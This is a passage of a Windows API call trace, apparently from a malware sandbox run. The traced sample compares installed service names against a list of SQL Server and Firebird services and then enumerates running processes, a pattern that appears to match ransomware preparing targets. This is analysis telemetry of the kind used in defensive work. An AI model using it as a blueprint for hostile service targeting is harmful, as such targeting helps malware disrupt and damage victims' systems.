lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0310.394] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0310.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0310.394] lstrlenW (lpString="CryptSvc") returned 8 [0310.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0310.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0310.394] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0310.394] lstrlenW (lpString="DcomLaunch") returned 10 [0310.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0310.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0310.394] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0310.394] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0310.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0310.395] lstrlenW (lpString="DeviceAssociationService") returned 24 [0310.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0310.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0310.395] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0310.395] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0310.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0310.395] lstrlenW (lpString="Dhcp") returned 4 [0310.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0310.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0310.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0310.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0310.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0310.395] lstrlenW (lpString="Dnscache") returned 8 [0310.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0310.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0310.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0310.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0310.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0310.395] lstrlenW (lpString="DPS") returned 3 [0310.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0310.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0310.395] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0310.395] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0310.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0310.395] lstrlenW (lpString="DusmSvc") returned 7 [0310.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0310.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0310.396] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0310.396] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0310.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0310.396] lstrlenW (lpString="EventLog") returned 8 [0310.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0310.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0310.396] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0310.396] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0310.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0310.396] lstrlenW (lpString="EventSystem") returned 11 [0310.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0310.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0310.396] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0310.396] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0310.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0310.396] lstrlenW (lpString="FontCache") returned 9 [0310.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0310.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0310.396] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0310.396] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0310.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0310.396] lstrlenW (lpString="gpsvc") returned 5 [0310.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0310.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0310.396] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0310.397] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0310.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0310.397] lstrlenW (lpString="iphlpsvc") returned 8 [0310.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0310.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0310.397] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0310.397] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0310.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0310.397] lstrlenW (lpString="KeyIso") returned 6 [0310.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0310.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0310.397] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0310.397] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0310.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0310.397] lstrlenW (lpString="LanmanServer") returned 12 [0310.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0310.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0310.397] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0310.397] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0310.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0310.397] lstrlenW (lpString="LanmanWorkstation") returned 17 [0310.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0310.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0310.397] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0310.397] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0310.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0310.398] lstrlenW (lpString="lfsvc") returned 5 [0310.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0310.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0310.398] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0310.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0310.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0310.398] lstrlenW (lpString="lmhosts") returned 7 [0310.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0310.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0310.398] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0310.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0310.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0310.398] lstrlenW (lpString="LSM") returned 3 [0310.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0310.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0310.527] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0310.527] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0310.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0310.527] lstrlenW (lpString="MpsSvc") returned 6 [0310.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0310.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0310.527] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0310.527] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0310.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0310.527] lstrlenW (lpString="NcbService") returned 10 [0310.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0310.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0310.527] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0310.527] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0310.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0310.527] lstrlenW (lpString="netprofm") returned 8 [0310.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0310.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0310.527] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0310.527] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0310.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0310.527] lstrlenW (lpString="NgcSvc") returned 6 [0310.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0310.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0310.527] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0310.527] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0310.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0310.528] lstrlenW (lpString="NlaSvc") returned 6 [0310.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0310.528] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0310.528] lstrlenW (lpString="nsi") returned 3 [0310.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0310.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0310.528] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0310.528] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0310.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0310.528] lstrlenW (lpString="PcaSvc") returned 6 [0310.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0310.528] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0310.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0310.528] lstrlenW (lpString="PlugPlay") returned 8 [0310.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0310.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0310.528] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0310.528] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0310.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0310.528] lstrlenW (lpString="Power") returned 5 [0310.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0310.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0310.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0310.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0310.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0310.539] lstrlenW (lpString="ProfSvc") returned 7 [0310.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0310.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0310.539] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0310.539] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0310.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0310.539] lstrlenW (lpString="RpcEptMapper") returned 12 [0310.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0310.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0310.539] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0310.539] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0310.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0310.539] lstrlenW (lpString="RpcSs") returned 5 [0310.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0310.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0310.539] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0310.539] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0310.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0310.539] lstrlenW (lpString="SamSs") returned 5 [0310.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0310.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0310.540] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0310.540] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0310.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0310.540] lstrlenW (lpString="Schedule") returned 8 [0310.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0310.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0310.540] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0310.540] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0310.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0310.540] lstrlenW (lpString="SecurityHealthService") returned 21 [0310.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0310.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0310.540] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0310.540] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0310.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0310.540] lstrlenW (lpString="SENS") returned 4 [0310.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0310.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0310.540] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0310.540] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0310.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0310.540] lstrlenW (lpString="ShellHWDetection") returned 16 [0310.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0310.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0310.540] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0310.541] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0310.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0310.541] lstrlenW (lpString="Spooler") returned 7 [0310.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0310.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0310.541] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0310.541] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0310.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0310.541] lstrlenW (lpString="StateRepository") returned 15 [0310.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0310.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0310.541] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0310.541] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0310.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0310.541] lstrlenW (lpString="SysMain") returned 7 [0310.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0310.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0310.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0310.541] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0310.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0310.541] lstrlenW (lpString="SystemEventsBroker") returned 18 [0310.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0310.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0310.541] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0310.541] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0310.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0310.542] lstrlenW (lpString="Themes") returned 6 [0310.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0310.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0310.542] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0310.542] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0310.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0310.542] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0310.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0310.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0310.542] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0310.542] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0310.543] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0310.543] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e4 [0310.551] Process32FirstW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.552] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.552] lstrlenW (lpString="System") returned 6 [0310.552] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.553] lstrlenW (lpString="smss.exe") returned 8 [0310.553] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.553] lstrlenW (lpString="csrss.exe") returned 9 [0310.554] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.558] lstrlenW (lpString="wininit.exe") returned 11 [0310.559] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.559] lstrlenW (lpString="csrss.exe") returned 9 [0310.559] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.560] lstrlenW (lpString="winlogon.exe") returned 12 [0310.560] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.560] lstrlenW (lpString="services.exe") returned 12 [0310.560] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.561] lstrlenW (lpString="lsass.exe") returned 9 [0310.561] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0310.562] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0310.562] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0310.562] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0310.562] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.563] lstrlenW (lpString="svchost.exe") returned 11 [0310.563] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.563] lstrlenW (lpString="svchost.exe") returned 11 [0310.564] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.564] lstrlenW (lpString="dwm.exe") returned 7 [0310.564] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.565] lstrlenW (lpString="svchost.exe") returned 11 [0310.565] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.565] lstrlenW (lpString="svchost.exe") returned 11 [0310.565] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.566] lstrlenW (lpString="svchost.exe") returned 11 [0310.566] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.566] lstrlenW (lpString="svchost.exe") returned 11 [0310.566] Process32NextW (in: hSnapshot=0x3e4, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 